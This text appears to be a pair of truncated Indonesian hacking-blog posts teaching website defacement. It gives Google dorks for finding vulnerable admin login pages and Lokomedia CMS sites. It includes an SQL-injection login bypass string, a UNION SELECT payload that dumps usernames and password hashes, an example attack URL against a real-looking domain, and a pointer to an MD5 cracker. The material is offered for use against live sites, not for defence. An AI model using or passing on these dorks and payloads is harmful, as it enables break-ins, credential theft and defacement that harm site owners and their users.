[+]Exploit title : Bypass sql login [+]Author : admin a.k.a Antuwarnet [+]Google dork : inurl/admi n/login.php "index.php?mnu=login" Halo, Jumpa lagi dengan admin yang gans:V kali ini admin akan memberikan Tutorial deface Bypass SQL Admin Login . okey deh gausah panjang lebar h3h3 langsung cekidot . [+]Proof 0f concept : Dorking dulu menggunakan dork di atas ,jika sudah dapat target jangan lupa masukan username dan password seperti contoh di bawah ini ka^~^ user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ if you enter your username and password as above, if the web is vuln it will automatically enter the admin dashboard No need to write user,email,password. Go to the uploader a...
Admin Jum'at 21 Juni 2019 Hallo bertemu lagi dengan admin di blog sederhana ini kali ini w mau kasih tahu deface metode sql lokomedia ok silahkan baca ya. 1.dork : inurl:/statis-1-profil.html inurl:/statis-2-profil.html inurl:/statis-3-profil.html kembangin lagi biar dapet yang fresh . 2.exploit : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ step by step : - Dorking pakek dork diatas - Pilih salah satu target - Ni gw dah dapet target - masukan exploit diatas contoh : target.co.il/statis--7'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+kantordesa.html - lalu kalian tinggal view-source : ketemu kan username dan password nya password dalam bentuk md5 maka harus di decrypt link : https://hashkiller.co.uk/Cracker/MD5 jika sudah di hash ,tinggal login untuk login...